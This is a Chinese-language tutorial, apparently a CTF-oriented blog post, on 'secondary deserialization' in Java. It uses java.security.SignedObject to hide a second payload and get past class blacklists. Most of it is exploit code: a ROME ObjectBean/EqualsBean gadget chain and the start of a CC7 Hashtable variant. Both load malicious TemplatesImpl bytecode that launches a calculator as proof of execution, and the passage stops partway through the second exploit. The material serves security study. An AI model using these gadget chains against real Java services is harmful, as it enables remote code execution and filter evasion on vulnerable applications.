不记得是哪一场比赛了,遇到了一个 Java 的题目,过滤了很多关键类,不管小编把 CC 链如何拆开组合,都没有办法绕过。
就在此时,大佬看了一眼说,用二次反序列化就可以绕过了。“二次反序列化”这六个字重重地敲在了我的心巴上,从那以后我就对二次反序列化产生了莫名的渴望。
小编开始详细学习时,发现没有二次反序列化比较系统的学习文章,那么,就自己总结一个。
简单介绍下二次反序列化,顾名思义,就是反序列化两次,其主要意义是 绕过黑名单的限制或不出网利用
PS:本文用到的工具类会放在文末
它,是 java.security
下一个用于创建真实运行时对象的类,更具体地说, SignedObject
包含另一个 Serializable
对象。
太完美了,这个类简直是为二次反序列化而存在的,来关注下它的 getObject()
反序列化的内容也是可控
那么小编思路瞬间清晰了,先构造一个恶意 SignedObject
KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
SignedObject signedObject = new SignedObject(恶意对象 用于第二次反序列化, kp.getPrivate(), Signature.getInstance("DSA"));
然后调用它的 getObject()
方法即可,那么现在压力来到了如何调用这个方法这边
提到调用 getter 方法,茯苓第一个想到的就是 rome 反序列化,众所周知,rome 的 ToStringBean
的 toString()
方法可以办到这件事,理论上是可行的,实际也是可以构造的
因为 ObjectBean
其在实例化时会实例化三个 bean,这样构造出来的内容过分长了,小编不喜欢
大家可以自行构造试试
,小编绝不是那种不负责的人,还是给出例子,但不进行具体分析
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import javax.xml.transform.Templates;
import java.security.*;
import java.util.HashMap;
import static util.Tool.*;
public class R_test {
public static void main(String[] args) throws Exception{
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{
payload("mate-calc").toBytecode()});
setFieldValue(obj, "_name", "Poria");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
HashMap hashMap1 = getpayload(Templates.class, obj);
KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();
SignedObject signedObject = new SignedObject(hashMap1, kp.getPrivate(), Signature.getInstance("DSA"));
HashMap hashMap2 = getpayload(SignedObject.class, signedObject);
run(hashMap2, "debug", "object");
}
public static HashMap getpayload(Class clazz, Object obj) throws Exception {
ObjectBean objectBean = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "rand"));
HashMap hashMap = new HashMap();
hashMap.put(objectBean, "rand");
ObjectBean expObjectBean = new ObjectBean(clazz, obj);
setFieldValue(objectBean, "_equalsBean", new EqualsBean(ObjectBean.class, expObjectBean));
return hashMap;
}
}
rome 链的关键转折点在于 pReadMethod.invoke(_obj,NO_PARAMS)
, EqualsBean
也存在这个关键代码
那么小编可以利用珍藏多年的 CC7 链,利用 Hashtable
来触发 equals
这步是 CC7 的构造方式,因为要构造两遍,所以写为静态方法。
构造恶意 TemplatesImpl
,将其装入第一个 Hashtable
构造恶意 SignedObject
,将其装入第二个 Hashtable
最终 exp
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javax.xml.transform.Templates;
import java.security.*;
import java.util.HashMap;
import java.util.Hashtable;
import static util.Tool.*;
public class R_SignedObject {
public static void main(String[] args) throws Exception{
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][]{
payload("mate-calc").toBytecode()});
setFieldValue(obj, "_name", "Poria");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
Hashtable table1 = getPayload(Templates.class, obj);
KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
kpg.initialize(1024);
KeyPair kp = kpg.generateKeyPair();